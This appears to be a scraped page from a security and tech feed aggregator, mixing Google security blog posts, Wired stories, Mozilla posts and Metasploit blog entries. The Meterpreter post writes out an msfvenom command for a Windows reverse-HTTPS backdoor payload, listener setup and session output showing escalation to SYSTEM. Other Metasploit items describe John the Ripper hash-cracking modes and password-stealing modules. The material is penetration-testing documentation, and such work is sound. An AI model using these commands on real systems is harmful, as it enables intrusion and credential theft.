Under pressure? Use a variety of DIY bio techniques to objectively gauge your stress before you burst.


Channel Image14:56 Teens Take to Roller Derby for Rowdy, Speedy Bouts» Wired Top Stories
The Rainbow Bites take on the Undead Avengers in wild pee-wee roller derby action.


Channel Image14:56 Tech tips that are Good to Know» Google Online Security Blog


(Cross-posted from the Official Google Blog)

Does this person sound familiar? He can’t be bothered to type a password into his phone every time he wants to play a game of Angry Birds. When he does need a password, maybe for his email or bank website, he chooses one that’s easy to remember like his sister’s name—and he uses the same one for each website he visits. For him, cookies come from the bakery, IP addresses are the locations of Intellectual Property and a correct Google search result is basically magic.

Most of us know someone like this. Technology can be confusing, and the industry often fails to explain clearly enough why digital literacy matters. So today in the U.S. we’re kicking off Good to Know, our biggest-ever consumer education campaign focused on making the web a safer, more comfortable place. Our ad campaign, which we introduced in the U.K. and Germany last fall, offers privacy and security tips: Use 2-step verification! Remember to lock your computer when you step away! Make sure your connection to a website is secure! It also explains some of the building blocks of the web like cookies and IP addresses. Keep an eye out for the ads in newspapers and magazines, online and in New York and Washington, D.C. subway stations.



The campaign and Good to Know website build on our commitment to keeping people safe online. We’ve created resources like privacy videos, the Google Security Center, the Family Safety Center and Teach Parents Tech to help you develop strong privacy and security habits. We design for privacy, building tools like Google Dashboard, Me on the Web, the Ads Preferences Manager and Google+ Circles—with more on the way.

We encourage you to take a few minutes to check out the Good to Know site, watch some of the videos, and be on the lookout for ads in your favorite newspaper or website. We hope you’ll learn something new about how to protect yourself online—tips that are always good to know!

Update 1/17: Updated to include more background on Good to Know.
Channel Image14:56 Tech job seekers less likely to be asked for social-media passwords» Network World NetFlash
There's been a good amount of talk recently about employers asking for the login information of job applicants. So, should those in the tech world expect the question to be asked the next time they're in an interview?
Channel Image14:56 Tacocopter: The Coolest Airborne Taco Delivery System That's Completely Fake» Wired Top Stories
We Wired reporters love our tacos. We're also obsessed with robotics and flying machines, just like many other members of the San Francisco tech community. So when a new local startup -- Tacocopter -- announced that it could deliver tacos straight to office workers via flying quadricopters, you can imagine our tizzy. We got a chance to talk to the brains behind Tacocopter, which doesn't actually exist quite yet.


Channel Image14:56 Symantec details mobile device management plans» Network World NetFlash
Symantec this week put the focus on its mobile security strategy with its announcement that it's acquiring Nukona, the software provider for mobile application management.
Channel Image14:56 Square's Payment App Goes Over to Android and Over the Counter» Wired Top Stories


Channel Image14:56 Sortie de chkrootkit en version 0.45» frenchkrootkit
Channel Image14:56 Sortie de chkrootkit 0.44» frenchkrootkit
Channel Image14:56 Safe Browsing Protocol v2 Transition» Google Online Security Blog


Last year, we released version 2 of the Safe Browsing API, along with a reference implementation in Python. This version provides more efficient updates compared to version 1, giving clients the most useful (freshest) data first. The new version uses significantly less bandwidth, and also allows us to serve data that covers more URLs than previously possible. Browsers including Chrome and Firefox have already migrated to version 2, and we are confident that the new version works well and delivers significant benefits compared to the previous version.

We are now planning to discontinue version 1 of the protocol to help us better focus our efforts and resources. On December 1, 2011, we will stop supporting version 1 and will take the service down shortly thereafter. If you are currently using version 1 of the protocol, we encourage you to migrate as soon as possible to the new version. In addition to the documentation and reference implementation, there’s a Google Group dedicated to the API where you may be able to get additional advice or ask questions as you prepare to transition. Those of you who who have already migrated to version 2 will not be affected and do not need to take any further action.

If you are looking to migrate from the version 1 API and are worried about the complexity of the version 2 API, we now have a lookup service that you can use in lieu of version 2 of the Safe Browsing Protocol if your usage is relatively low. The lookup service is a RESTful service that lets you send a URL or set of URLs to Google and receive a reply indicating the state of those URLs. You can use this API if you check fewer than 100,000 URLs per day and don’t mind waiting on a network roundtrip. This process may be simpler to use than version 2 of the Safe Browsing Protocol, but it is not supported for users who will generate excessive load (meaning that your software, either your servers or deployed clients, will collectively generate over 100,000 requests to Google in a 24-hour period).

If you are currently using version 1 of the Safe Browsing Protocol, please update to either the Safe Browsing Protocol version 2, or the lookup service, before December 1, 2011. If you have any questions, feel free to check out the Google Safe Browsing API discussion list.
Channel Image14:56 Safe Browsing Alerts for Network Administrators is graduating from Labs» Google Online Security Blog


Today, we’re congratulating Safe Browsing Alerts for Network Administrators on its graduation from Labs to its new home at http://www.google.com/safebrowsing/alerts/

We announced the tool about a year ago and have received a lot of positive feedback. Network administrators, large and small, are using the information we provide about malware and phishing URLs to clean up their networks and help webmasters make their sites safer. Earlier this year, AusCert recognized our efforts by awarding Safe Browsing Alerts for Network Administrators the title of “Best Security Initiative.”

If you’re a network administrator and haven’t yet registered your AS, you can do so here.
Channel Image14:56 SC-L RSS Feed» securecoding.org
An RSS feed of the Secure Coding mailing list (SC-L) has been made available by Mail-Archive.com.
Channel Image14:56 Restless Nights Inspire Artist's Spectral Photos» Wired Top Stories
Artist Robert Knight's long-exposure photography visualizes people's nocturnal movements as they sleep, or don't, throughout the night. His photo project, Sleepless, consists of ghostly aggregations of subjects tossing and turning. The idea for the series came from his own bout of insomnia after he and his wife became parents.


Channel Image14:56 Responsive Images: How they Almost Worked and What We Need» A List Apart
With a mobile-first responsive design approach, if any part of the process breaks down, your user can still receive a representative image and avoid an unnecessarily large request on a device that may have limited bandwidth. But with several newer browsers implementing an “image prefetching” feature that allows images to be fetched before parsing the document’s body, some of the web's brightest developers are abandoning responsive images in favor of user agent detection, at least as a temporary solution. For us standardistas, UA detection leaves a bad taste in the mouth. More importantly, as the number and kinds of devices continue to grow, UA detection will quickly become untenable—just as browser detection did back in the bad old days before web standards. What's really needed, argues Mat Marquis, is a new markup element that works the way the HTML5 video element works. Sound crazy? So crazy it just might work.
Channel Image14:56 Report examines Privacy Implications of Data.Gov» Center for Democracy and Technology
CDT today released a Policy Post discussing privacy implications for the federal data clearinghouse known as data.gov and de-identification considerations for the Open Government Directive. While this initiative signifies a step in the right direction towards a more open and transparent federal government, it must be done in concert with protecting the privacy of individuals. The Policy Post recommends specialized review procedures for each data set on data.gov. In addition, it says that different levels of data protections should be implemented in different contexts and that de-identification guidelines should be adaptable over time. This is essential in addressing consumer privacy risks associated with handling large data sets, as is the case with data.gov.
Channel Image14:56 Reminder: Safe Browsing version 1 API turning down December 1» Google Online Security Blog


In May we announced that we are ending support for the Safe Browsing protocol version 1 on December 1 in order to focus our resources on the new version 2 API and the lookup service. These new APIs provide simpler and more efficient access to the same data, and they use significantly less bandwidth. If you haven't yet migrated off of the version 1 API, we encourage you to do so as soon as possible. Our earlier post contains links to documentation for the new protocol version and other resources to help you make the transition smoothly.

After December 1, we will remove all data from the version 1 API list to ensure that any remaining clients do not have false positives in their database. After January 1, 2012, we will turn off the version 1 service completely, and all requests will return a 404 error.

Thanks for your cooperation, and enjoy using the next generation of Safe Browsing.
Channel Image14:56 Quiz: Are you a true nerd?» HowStuffWorks Daily Feed
So, you pride yourself on math proficiency and an intimate knowledge of Wookiee mating rituals. But do you really know everything there is to know about nerd culture? Test your nerd levels with our quiz.


Channel Image14:56 Quick update on our vulnerability reward program» Google Online Security Blog


About a week and a half ago we launched a new web vulnerability reward program, and the response has been fantastic. We've received many high quality reports from across the globe. Our bug review committee has been working hard, and we’re pleased to say that so far we plan to award over $20,000 to various talented researchers. We'll update our 'Hall of Fame' page with relevant details over the next few days.

Based on what we've received over the past week, we've clarified a few things about the program — in particular, the types of issues and Google services that are in scope for a reward. The review committee has been somewhat generous this first week, and we’ve granted a number of awards for bugs of low severity, or that wouldn’t normally fall under the conditions we originally described. Please be sure to review our original post and clarification thoroughly before reporting a potential issue to us.
Channel Image14:56 Protecting users from malware hosted on bulk subdomain services» Google Online Security Blog


Over the past few months, Google’s systems have detected a number of bulk subdomain providers becoming targets of abuse by malware distributors. Bulk subdomain providers register a domain name, like example.com, and then sell subdomains of this domain name, like subdomain.example.com. Subdomains are often registered by the thousands at one time and are used to distribute malware and fake anti-virus products on the web. In some cases our malware scanners have found more than 50,000 malware domains from a single bulk provider.

Google’s automated malware scanning systems detect sites that distribute malware. To help protect users we recently modified those systems to identify bulk subdomain services which are being abused. In some severe cases our systems may now flag the whole bulk domain.

We offer many services to webmasters to help them fight abuse, such as:
If you are the owner of a website that is hosted in a bulk subdomain service, please consider contacting your bulk subdomain provider if Google SafeBrowsing shows a warning for your site. The top-level bulk subdomain may be a target of abuse. Bulk subdomain service providers may use Google’s tools to help identify and disable abusive subdomains and accounts.
Channel Image14:56 Protecting users from malicious downloads» Google Online Security Blog


For the past five years Google has been offering protection to users against websites that attempt to distribute malware via drive-by downloads — that is, infections that harm users’ computers when they simply visit a vulnerable site. The data produced by our systems and published via the Safe Browsing API is used by Google search and browsers such as Google Chrome, Firefox, and Safari to warn users who may attempt to visit these dangerous webpages.

Safe Browsing has done a lot of good for the web, yet the Internet remains rife with deceptive and harmful content. It’s easy to find sites hosting free downloads that promise one thing but actually behave quite differently. These downloads may even perform actions without the user’s consent, such as displaying spam ads, performing click fraud, or stealing other users’ passwords. Such sites usually don’t attempt to exploit vulnerabilities on the user’s computer system. Instead, they use social engineering to entice users to download and run the malicious content.

Today we’re pleased to announce a new feature that aims to protect users against these kinds of downloads, starting with malicious Windows executables. The new feature will be integrated with Google Chrome and will display a warning if a user attempts to download a suspected malicious executable file:

Download warning


This warning will be displayed for any download URL that matches the latest list of malicious websites published by the Safe Browsing API. The new feature follows the same privacy policy currently in use by the Safe Browsing feature. For example, this feature does not enable Google to determine the URLs you are visiting.

We’re starting with a small-scale experimental phase for a subset of our users who subscribe to the Chrome development release channel, and we hope to make this feature available to all users in the next stable release of Google Chrome. We hope that the feature will improve our users’ online experience and help make the Internet a safer place.

For webmasters, you can continue to use the same interface provided by Google Webmaster Tools to learn about malware issues with your sites. These tools include binaries that have been identified by this new feature, and the same review process will apply.
Channel Image14:56 Protecting data for the long term with forward secrecy» Google Online Security Blog


Last year we introduced HTTPS by default for Gmail and encrypted search. We’re pleased to see that other major communications sites are following suit and deploying HTTPS in one form or another. We are now pushing forward by enabling forward secrecy by default.

Most major sites supporting HTTPS operate in a non-forward secret fashion, which runs the risk of retrospective decryption. In other words, an encrypted, unreadable email could be recorded while being delivered to your computer today. In ten years time, when computers are much faster, an adversary could break the server private key and retrospectively decrypt today’s email traffic.

Forward secrecy requires that the private keys for a connection are not kept in persistent storage. An adversary that breaks a single key will no longer be able to decrypt months’ worth of connections; in fact, not even the server operator will be able to retroactively decrypt HTTPS sessions.

Forward secret HTTPS is now live for Gmail and many other Google HTTPS services(*), like SSL Search, Docs and Google+. We have also released the work that we did on the open source OpenSSL library that made this possible. You can check whether you have forward secret connections in Chrome by clicking on the green padlock in the address bar of HTTPS sites. Google’s forward secret connections will have a key exchange mechanism of ECDHE_RSA.

We would very much like to see forward secrecy become the norm and hope that our deployment serves as a demonstration of the practicality of that vision.


(* Chrome, Firefox (all platforms) and Internet Explorer (Vista or later) support forward secrecy using elliptic curve Diffie-Hellman. Initially, only Chrome and Firefox will use it by default with Google services because IE doesn’t support the combination of ECDHE and RC4. We hope to support IE in the future.)
Channel Image14:56 Pricing Strategy for Creatives» A List Apart
Strategic pricing helps your brand and helps you to make more money. Issuing a price is like handing out a business card—it’s a great branding tool, but be careful about what it says to your market. Beginning relationships with customers at a high price makes the statement: “we’re good at what we do and we know it.” Fighting with a competitor over a low price says “I’m uncertain about my abilities, so I’ll take what I can get.” Failing to use a considered pricing policy will leave you treading water in a sea of design mediocrity, allowing you to just stay afloat while you sell commodities. Jason Blumer explains how to become strategic about your pricing—including three things you can do immediately to kick-start your journey toward strategic pricing.
Channel Image14:56 Prank Show Loiter Squad Continues Odd Future's Attack on Political Correctness» Wired Top Stories
Odd Future, the Los Angeles-based band of nihilistic rapping skater-punks, is broadening its assault on polite society. Led by de facto captain Tyler, the Creator, the crew of marauding youths is launching Loiter Squad -- a hidden-camera prank fest on Adult Swim -- on Sunday.


Channel Image14:56 Planet Visibility...» Hacking for Christ
I've been told that my blog posts are popping to the top of Planet Mozilla every time someone adds a comment. While I hope what I write is interesting, I promise this is not a desperate bid for more publicity. We suspect that the recent Movable Type upgrade for the MozillaZine weblog server has something to do with it (although we're not saying it's got a bug rather than the Planet software). It's being looked into. In the mean time, please bear with us :-)...
Channel Image14:56 Pirate Bay Sets Course for Un-Killable Cloud» Wired Top Stories
If you walked past an Apple storefront last year, you might have seen the display of the MacBook Air, appearing to float on the string of a balloon. The first aerial cloud service provider may not be far behind, writes Alexander Haislip.


Channel Image14:56 Password Cracking in Metasploit with John the Ripper» Metasploit

HDM recently added password cracking functionality to Metasploit through the inclusion of John-the-Ripper in the Framework. The 'auxiliary/analyze/jtr_crack_fast' module was created to facilitate JtR's usage in Framework and directly into Express/Pro's automated collection routine. The module works against known Windows hashes (NTLM and LANMAN). It uses hashes in the database as input, so make sure you've run hashdump with a database connected to your Framework instance (Pro does this automatically) before running the module. The module collects the hashes in the database and passes them to the john binaries that are now (r13135) included in Framework via a generated PWDUMP-format file.

 

Several JtR modes are utilized for quick and targeted cracking. First, wordlist mode: The generated wordlist consists of the standard john wordlist with known usernames, passwords, and hostnames appended. A ruleset based on the Korelogic mutation rules is then used to generate mutations of these words. You can find the msf version of these rules here.

 

Once the initial wordlist bruting is complete, incremental bruting rules, aptly named All4 & Digits5, are used to brute force additional combinations. These rulesets are shown below and can be found in the same john.conf configuration file in the Framework.

 

Cracked values are appended to the wordlist as they're found. This is beneficial :

  1. Previously-cracked hashes are pulled from the john.pot at the start of a run and these passwords are used as seed values for subsequent runs.
  2. Mutation rules are applied to cracked passwords, possibly enabling other previously-uncracked hashes to be broken.

 

Finally, discovered username/password combinations are reported to the database and associated with the host / service.

 

Cracking modes:

--wordlist=<ourgenerated wordlist> --rules single --format=lm

--incremental=All4--format=lm

--incremental=Digits5--format=lm

--wordlist=<ourgenerated wordlist> --rules single --format=ntlm

--incremental=All4--format=ntlm

--incremental=Digits5--format=lm

 

Incremental Rulesets:

[Incremental:All4]

File = $JOHN/all.chr

MinLen = 0

MaxLen = 4

CharCount = 95

 

[Incremental:Digits5]

File =$JOHN/digits.chr

MinLen = 1

MaxLen = 5

CharCount = 10

 

As with everything in the framework, it's subject to patches and improvement, so make sure to check the code. Thanks to mubix for several edits. This info is current as of July 27, 2011.

 

UPDATE: Check out KoreLogic's upcoming Defcon 19 password cracking contest if you're interested in this stuff!

Channel Image14:56 PHP X-Cart Vulnerability Analysis» securecoding.org
In this latest vulnerability analysis we introduce a new analyst and ponder the fine art of user input screening as it applies to a well-known PHP application.
Channel Image14:56 Op/Ed Regarding Bluetooth Vulnerability» securecoding.org
In their latest op/ed, Mark and Ken comment on a disturbing new bluetooth vulnerability affecting mobile phones manufactured by Nokia and SonyEricsson.
Channel Image14:56 Mozilla's Competitive Advantages» Hacking for Christ
Mozilla competes with 3 massive multinational companies (Google, Apple and Microsoft) who have between 30 and 200 times more employees than we do, allied with development and marketing budgets which dwarf our entire income. There is a clear and obvious revenue stream (advertising via search) tied directly to success in our market. They have awesomely powerful distribution channels that we just don't have. How can we possibly win? What are our competitive advantages? I suggest we have 3: Community Hard numbers are difficult to come by, but the often-quoted figure is that 40% of the Mozilla codebase is contributed by people we don't employ. However, that doesn't count the massive efforts people put in doing QA, documentation, support, local activism, and encouraging their friends to download, install and use Firefox. IE doesn't have fans so keen they do this. Or this. When the Mozilla Foundation was 6 people in a borrowed office somewhere in Silicon Valley wondering what they'd do when AOL's $2 million ran out, the community was what kept us going. And they've been vital ever since. One thing which prevents the community growing is that we keep hiring people out of it. Which is fine - but if we want to keep employing people who believe in what we do, rather than people who are just here for a few years as the next step on their career ladder and because Mozilla looks good on the CV, it's important to keep that source of passionate talent healthy. Which means giving responsibility to people we don't pay, levelling the playing fields inside the project, and enabling meaningful participation. We need to make sure we don't take our community for granted. Ideals If you promote your product as "the new shiny", then people will leave it pursuit of the newer and shinier. I think that a while back, someone realised this, and that led to the Mozilla marketing being refocussed to emphasize more that we are a non-profit, and are in this for the good of the web, not the good of the shareholders. I'm sure a large proportion of Chrome users are ex-Firefox users. In the time before Chrome, when we were the new shiny, we missed an opportunity to educate them about why Mozilla is different, why the open web is important, and why having the coolest, fastest, slickest browser around is a great thing but it's...
Channel Image14:56 Mozilla Governance: Module Ownership System» Hacking for Christ
A key part of how the Mozilla project runs is the Module system, which breaks project activities and codebases down into discrete chunks and assigns an owner to each. The documentation of who owns what is on the Mozilla wiki. So if you want to find out who to talk to about FooBar-ing in Mozilla, that's the place to look. If you don't find the owner of FooBar documented there, then you'll need to find out who's in charge by asking around. But once you do find out, please suggest to that person that they head over to the Modules page and get their ownership formalized by applying to create a new FooBar module. It's not a complicated process....
Channel Image14:56 More networking news,features and forums» Network World NetFlash
Channel Image14:56 More Analysis of the Fake Birdman Video» Wired Top Stories
The bird-man video is now a verified hoax, but there's still some value in seeing how he tricked us. Dot Physics blogger Rhett Allain takes a second look at camera shake-faking in artist Floris Kaayk's YouTube video.


Channel Image14:56 Mitchell on "Mozilla in the New Internet Era"» Hacking for Christ
Mitchell has written Mozilla in the New Internet Era, a post on the future direction of Mozilla, which I recommend to you. If I had to summarise it in one short sentence, it would be "Goal 2 is incredibly important". And I absolutely agree with that. Mitchell says: "With Firefox, we won this first round of the fight for user sovereignty." That's also true, and something we can be very proud of. I think we have to keep working if we want to hold on to that victory, and Mitchell's post makes it clear she agrees. She writes in the comments that "keeping Firefox vibrant remains really important to building an open web platform". We need to keep working on Goal 1. But if both goals are still in play, the issue remains: what we do about the fact that some ways of working towards Goal 2 harm our work on Goal 1?...
Channel Image14:56 Microsoft, West Coast Customs Create the Ultimate 400-hp 'Device'» Wired Top Stories
Microsoft and West Coast Customs team up to create the ultimate connected car, complete with customizable displays, XBox Kinetic integration and 400 horsepower.


Channel Image14:56 Microsoft Gits With the Cool Kids of Open Source» Wired Top Stories
Microsoft is gitting with the times. On Friday, the company announced that CodePlex -- the website it spawned for open source software projects -- will support Git, a system that's widely used in the open source world to manage software development projects.


Channel Image14:56 Meterpreter HTTP/HTTPS Communication» Metasploit

The Meterpreter payload within the Metasploit Framework (and used by Metasploit Pro) is an amazing toolkit for penetration testing and security assessments. Combined with the Ruby API on the Framework side and you have the simplicity of a scripting language with the power of a remote native process. These are the things that make scripts and Post modules great and what we showcase in the advanced post-exploit automation available today. Metasploit as a platform has always had a concept of an established connection equating to a session on a compromised system. Meterpreter as a payload has supported reverse TCP connections, bind shell listeners, transport over Internet Explorer using ActiveX controls (PassiveX),and more recently a HTTPS stager. This is finally changing.

 

Corporate egress filters are becoming tighter and the standard connect-back payload has become less useful for large-scale end-user phishing campaigns. The PassiveX payload worked well for specific versions of Internet Explorer, but is becoming harder to support due to version and platform differences. The HTTPS stager within Metasploit works, but only the first stage of the connection used the target's proxy settings and authentication; the second stage required a full persistent SSL connection from Meterpreter back to the attacking system.

 

Rob Fuller (who many know as mubix) was lamenting this state of affairs last Sunday and convinced me to actually do something about it. The result is native support for HTTP and HTTPS transports for the Meterpreter payload, available in the Metasploit Framework open source tree immediately. Our Metasploit Pro users will be able to take advantage of the new HTTPS stager for phishing campaigns once the code has gone through a full regression test. These payloads use the WinInet API and will leverage any proxy or authentication settings the user has configured for internet access. The HTTPS stager will cause the entire communication path to be encrypted through SSL.The HTTP stager, even without encryption, will still follow the HTTP protocol specification and allow the payload to breeze through protocol inspecting gateways.

 

These new stagers (reverse_http and reverse_https) are a drastic departure from our existing payloads for one singular reason; they are no longer tied to a specific TCP session between the target and the Metasploit user. Instead of a stream-based communication model, these stagers provide a packet-based transaction system instead. This mode matches the behavior of many malware families and botnets. The challenge with these payloads is identifying when the user is "done"; this is accomplished in three different ways:

 

1. The payload has a hard-coded expiration date stamped into it during the initial staging process. By default, this is one week from the current date (relative to the target). This prevents a forgotten session from connecting back indefinitely. You can control this setting through the SessionExpirationTimeout advanced option. Setting this value to 0 indicates that it should continue connecting back until the process is forcibly killed or the target is restarted.

 

2. The payload has a hard-coded keep-alive timeout stamped into it during the staging process. This tells the payload to shutdown on its own if it is unable to connect back for a specific number of seconds. By default this is 300 secoinds (5 minutes), but it can be changed by setting the SessionCommunicationTimeout parameter. Just like the SessionExpirationTimeout option,setting this to 0 will result in a session that will never timeout, which has some interesting uses, as described below.

 

3. Finally, the Meterpreter payload now exposes a shutdown API (core_shutdown). This is called automatically when the session is exited through the Metasploit Console. To avoid shutting down the payload but still exit the temporary session, use the detach command from the Meterpreter prompt. Keep in mind that if the SessionCommunicationTimeout is hit (5 minutes of not being able to reach a listening handler), the payload will terminate anyways. Setting this option to 0 and detaching the session will instruct the payload to keep reaching out until the SessionCommunicationTimeout is hit or the process is killed.

 

With the new behavior and the three termination options above, some new capabilities are exposed.

 

If you are conducting a penetration test in which the compromised target has spotty internet access, setting SessionCommunicationTimeout to 0 will ensure that your session will reattach whenever the target comes back online (as long as the handler is running). Even better, the target will use the currently configured proxy server and authentication settings to reach the Metasploit server. Rob Fuller tested the new payloads through TOR and the payload was able to keep a session alive even when the exit nodes were being changed and the TOR service was turned on and off.  This level of resiliency previously required a payload to be written to disk, which goes against one of the core principals of the Metasploit design.

 

If you are conducting a penetration test and want to change the IP to which your incoming connections are received, just use a DNS name for LHOST and modify the DNS record as needed (set a low TTL). If the name does not resolve and the SessionCommunicationTimeout and SessionExpirationTimeout settings have not been reached, the payload will continue trying to resolve the name and connect back. The session will continue to follow DNS changes and IP changes on the target side.

 

The work that was done to support a transactional HTTP-based communication model can be easily extended to support other communication channels in the future. Communicating through IRC, using Pastebin documents, or really any other form of network communication is now relatively simple to implement. Malware, botnets, and backdoors are using increasingly sophisticated communication channels and it is about time that our security tools caught up.

 

The command line below will generate a Windows executable that uses the new HTTPS stager:

 

$ msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=consulting.example.org LPORT=4443 > metasploit_https.exe

 

This sequence of Metasploit Console commands will configure a listener to handle the requests:

 

$ ./msfconsole

msf> use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https

msf exploit(handler) > set LHOST consulting.example.org

msf exploit(handler) > set LPORT 4443

msf exploit(handler) > set SessionCommunicationTimeout 0

msf exploit(handler) > set ExitOnSession false

msf exploit(handler) > exploit -j

[*] Exploit running as background job.

[*] Started HTTPS reverse handler on https://consulting.example.org:4443/

[*] Starting the payload handler...

 

 

Running the executable on the target results in:

 

[*] 192.168.0.129:51375 Request received for /INITM...

[*] 192.168.0.129:51375 Staging connection for target /INITM received...

[*] Patched transport at offset 486516...

[*] Patched URL at offset 486248...

[*] Patched Expiration Timeout at offset 641856...

[*] Patched Communication Timeout at offset 641860...

[*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51375) at 2011-06-29 02:43:55 -0500

 

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

 

meterpreter > getuid

Server username: Spine\HD

 

meterpreter > getsystem

...got system (via technique 1).

 

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

 

meterpreter > detach

[*] Meterpreter session 1 closed.  Reason: User exit

 

At this point, we can close the Metasploit Console and bring it up at any time.

 

After running the handler again with the same parameters:

 

[*] 192.168.0.129:51488 Request received for /CONN_mmOJARwJFmHbqXKu/...

[*] Incoming orphaned session CONN_mmOJARwJFmHbqXKu, reattaching...

[*] Meterpreter session 1 opened (192.168.0.3:4443 -> 192.168.0.129:51488) at 2011-06-29 02:44:24 -0500

 

msf exploit(handler) > sessions -i 1

[*] Starting interaction with 1...

 

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

 

 

You can see that the session has maintained state even across different instances of Metasploit.

 

This concept applies to background tasks like the keystroke sniffer, network sniffer, and other fuctions that accumulate information in the background.

 

-HD

Channel Image14:56 Metasploit Framework Console Output Spooling» Metasploit

Sometimes little things can make a huge difference in usability -- the Metasploit Framework Console is a great interface for getting things done quickly, but so far, has been missing the capability to save command and module output to a file. We have a lot of small hacks that makes this possible for certain commands, such as the "-o" parameter to db_hosts and friends, but this didn't solve the issue of module output or general console logs.

 

As of revision r13028 the console now supports the spool command (similar to database consoles everywhere). This command accepts one parameter, the name of an output file. Once set, this will cause all console output to be shown on the screen and written to the file. Calling the spool command with the parameter "off" will disable the spool. Even better, this command opens the destination file in append-only mode, so you can add the following line to your ~/.msf3/msfconsole.rc to automatically log all of your output for the rest of time:

 

spool /home/<username>/.msf3/logs/console.log

 

Thanks to oorang3 on freenode for the suggestion. To access the new command, use the msfupdate command on Linux (or just "svn update") or the Metasploit Update link on Windows.

 

If you are running a version of the Metaspoit Framework that used one of the binary installers prior to 3.7.2, we strongly recommend upgrading to take advantage of the improved auto-update capabilities and dependency fixes in that release.

 

-HD

Channel Image14:56 Metasploit Framework 4.0 Released!» Metasploit



It's been a long road to 4.0. The first 3.0 release was almost 5 years ago and the first release under the Rapid7 banner was almost 2 years ago. Since then, Metasploit has really spread its wings. When 3.0 was released, it was under a EULA-like license with specific restrictions against using it in commercial products. Over time, the reasons for that decision became less important and the need for more flexibility came to the fore; in 2008, we released Metasploit 3.2 under a 3-clause BSD license. Licensing is definitely not the only place Metasploit's fexibility has increased. Over the last 5 years, we've added support for myriad exploitation techniques, network protocols, automation capabilities, and even user interfaces. The venerable msfweb is gone along with the old gtk-based msfgui. Taking their place are the newer java-based msfgui and armitage, both of which have improved by leaps and bounds since their respective introductions.

 

Five years ago, every exploitation tool out there was focused on running an exploit and getting a shell (usually a crappy cmd.exe shell, at that). Today, Metasploit encompasses every aspect of a penetration test. Dozens of auxiliary modules assist with reconnaisance, more than two hundred others help with information gathering and discovery; hundreds of exploits get you a toe-hold on the network; and the newest addition to the module family, post modules, help simplify and automate increasing your access. All of the data you gather can be stored in a database. For high-quality reporting and even greater automation, Metasploit Pro rounds out an engagement. Five years ago, Metasploit had already come a long way in making exploit development easier but the widespread adoption of DEP and ASLR has pushed the project even further toward accelerating what has now become a much more difficult process.

 

All of that leads us to the Metasploit Framework version 4.0, released today.

 

To make the awesomeness of 4.0 stand out visually from its predecessors, we've built an array of stunning new ASCII art banners. My favorite, of course, is this one:

 

i-heart-shells.png

 

In addition to the visual differences, Metasploit Framework 4.0 comes with an abundance of new features and bug fixes. Contributor TheLightCosine continues with his onslaught of password-stealing post modules and another contributor, Silent Dream, has begun helping out in that arena as well. Other post modules have seen considerable improvement and expansion thanks to Carlos Perez. The recent Exploit Bounty netted a total of six new exploit modules, and other development added another 14 since the last release.

 

Adding to Metasploit's extensive payload support, Windows and Java Meterpreter now both support staging over http and Windows can use https. In a similar vein, POSIX Meterpreter is seeing some new development again. The last developer left it with little documentation on how to build it, so getting it to compile was a hurdle that we put off for too long. Now that it compiles, you can expect a more flexible payload for Linux. It still isn't perfect nor is it nearly as complete as the windows version, but many features already work.

 

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets. As always, you can get the latest version from http://www.metasploit.com/download/ and full details of this release can be found in the Release Notes.

 

Everyone on the Metasploit team is proud of the first major version bump in half a decade. May it bring you many shells.

Channel Image14:56 Metasploit Framework 3.7.2 Released!» Metasploit



It's that time again! The Metasploit team is proud to announce the immediate release of the latest version of the Metasploit Framework, 3.7.2. Today's release includes eleven new exploit modules and fifteen post modules for your pwning pleasure. Adding to Metasploit's well-known hashdump capabilities, now you can easily steal password hashes from Linux, OSX, and Solaris. As an added bonus, if any of the passwords were hashed with crypt_blowfish (which is the default on some Linux distributions) any time since 1998, they may be considerably easier to crack. For more cracking fun, Maurizio Agazzini and Mubix's hard work has paid off in a new cachedump module. As the name implies, cachedump allows you to steal Windows cached password hashes. They can't be used directly like those obtained with hashdump, but JtR can crack them. If cracking sounds hard regardless of 13 year old bugs and proprietary hash algorithms, you might be interested in the latest post modules from TheLightCosine: they steal passwords from several applications which conveniently store them for lazy users in what is equivalent to plaintext.

 

Metasploit gets better every day.

 

For more details about this release, see the 3.7.2 Release Notes

Channel Image14:56 Metasploit Exploit Bounty - Status Update» Metasploit

A few weeks ago the Metasploit team announced a bounty program for a list of 30 vulnerabilities that were still missing Metasploit exploit modules. The results so far have been extremely positive and I wanted to take a minute to share some of the statistics.

 

As of last night, there have been 27 participants in the bounty program resulting in 10 submissions, with 5 of those already comitted to the open source repository and the rest in varying states of completeness.

 

One vulnerability was proven to be incredibly difficult (and likely impossible) to exploit, as Joshua Drake writes in his extensive blog post about the research process. For those who haven't spent a week banging your head against a difficult bug, this post can give you an idea how much work is involved just to state whether or not a security flaw is exploitable. Microsoft bulletins tend to error on the side of exploitability even when there isn't direct evidence to make the case for code execution.

 

Christopher Mcbee (Hal) deserves recognition for being the first person to submit a module for the Siemens FactoryLink vulnerability.

 

Alino was not only the first person to claim a $500 bounty, but he also managed to complete a second bounty as well!

 

Not everything went according to plan; three participants gave up before the one week deadline, eleven folks were not able to submit something in time, and one was disqualified for attempting to submit a snippet of commercial code as their own. One thing has been clear though; the Metasploit Community includes some amazing exploit developers and has an energy level that is tough to find in any other area of information security. Since the bounty was announced we have seen a record level of new patches, modules, suggestions, and community participation in the development process.

 

The bounty program is still running until July 20th; if you haven't had a chance to look at the list, you are running out of time to claim an item before the final deadline. Thanks again to everyone who participated so far and keep the submissions coming!

 

-HD

Channel Image14:56 Metasploit Bounty: Code, Sweat, and Tears» Metasploit

After more than 30 days of hardcore and intense exploit hunting, the Metasploit Bounty program has finally come to an end. First off, we'd like to say that even though the Metasploit Framework has made exploit development much easier, the process is not always an easy task. We're absolutely amazed how hard our participants tried to make magic happen.

 

Often, the challenge begins with finding the vulnerable software. If you're lucky, you can find what you need from 3rd-party websites that mirror different versions of the application, or you can download the trial version from the vendor (that is, if the trial version is still vulnerable).  If you can't find it this way, well, good luck getting your hands on it. This process alone can sometimes take more time than writing the exploit.  Unfortunately, quite a few of our participants gave up at this phase.

 

